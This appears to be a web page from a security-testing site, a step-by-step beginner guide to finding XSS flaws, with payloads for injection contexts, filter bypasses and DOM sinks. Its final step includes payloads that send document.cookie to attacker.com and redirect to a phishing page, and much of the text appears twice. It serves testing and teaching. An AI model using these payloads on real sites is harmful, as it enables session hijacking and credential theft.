Home GuidesCross-Site Scripting (XSS) Testing Guide

Cross-Site Scripting (XSS) Testing Guide

Learn how to test for reflected, stored, and DOM-based XSS vulnerabilities with step-by-step methodology, payload examples, and remediation guidance.

Beginner

6 steps20 payload examples~60 min

Authorized testing only. Only use these techniques on systems you have explicit permission to test.

Identify input reflection points

Map all user-controlled inputs that reflect in the HTTP response. Check URL parameters, form fields, HTTP headers (Referer, User-Agent), and cookie values. Use your browser's DevTools to search the page source for your input string.

Example payloads

testpayload12345

<b>test</b>

"><test

Determine the injection context

Analyze where your input lands in the HTML. The context determines which payloads will work: HTML body, inside an attribute, within a script block, or in a URL. View the page source to identify the exact context.

Example payloads

<!-- HTML body --> <script>alert(1)</script>

<!-- Attribute --> " onfocus=alert(1) autofocus="

<!-- JavaScript --> ';alert(1);//

<!-- URL --> javascript:alert(1)

Test basic payloads

Start with simple payloads to check if any filtering or encoding exists. If basic payloads are blocked, note which characters or keywords are filtered to plan bypass techniques.

Example payloads

<script>alert(document.domain)</script>

<img src=x onerror=alert(1)>

<svg onload=alert(1)>

<details open ontoggle=alert(1)>

Attempt filter bypass techniques

If input is sanitized, try encoding (HTML entities, URL encoding, Unicode), case variation, tag/event alternatives, and payload obfuscation. Test for incomplete sanitization such as recursive filtering.

Example payloads

<ScRiPt>alert(1)</ScRiPt>

<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

<svg/onload=alert(1)>

<<script>script>alert(1)<</script>/script>

Test for DOM-based XSS

Check for JavaScript that uses dangerous sinks (innerHTML, document.write, eval) with user-controlled sources (location.hash, location.search, document.referrer). Use browser DevTools to trace data flow from sources to sinks.

Example payloads

#<img src=x onerror=alert(1)>

?default=<script>alert(1)</script>

javascript:alert(document.domain)

Verify impact and document findings

Confirm the XSS executes in a victim's browser context. Document the payload, affected URL, injection point, and potential impact (session hijacking, credential theft, defacement). Test in multiple browsers for consistency.

Example payloads

<script>fetch("https://attacker.com/log?c="+document.cookie)</script>

<script>document.location="https://attacker.com/phish"</script>

Related Resources

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

$loading...

Determine the injection context

Example payloads

<!-- HTML body --> <script>alert(1)</script>

<!-- Attribute --> " onfocus=alert(1) autofocus="

<!-- JavaScript --> ';alert(1);//

<!-- URL --> javascript:alert(1)

Test basic payloads

Start with simple payloads to check if any filtering or encoding exists. If basic payloads are blocked, note which characters or keywords are filtered to plan bypass techniques.

Example payloads

<script>alert(document.domain)</script>

<img src=x onerror=alert(1)>

<svg onload=alert(1)>

<details open ontoggle=alert(1)>

Attempt filter bypass techniques

Example payloads

<ScRiPt>alert(1)</ScRiPt>

<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>

<svg/onload=alert(1)>

<<script>script>alert(1)<</script>/script>

Test for DOM-based XSS

Example payloads

#<img src=x onerror=alert(1)>

?default=<script>alert(1)</script>

javascript:alert(document.domain)

Verify impact and document findings

Example payloads

<script>fetch("https://attacker.com/log?c="+document.cookie)</script>

<script>document.location="https://attacker.com/phish"</script>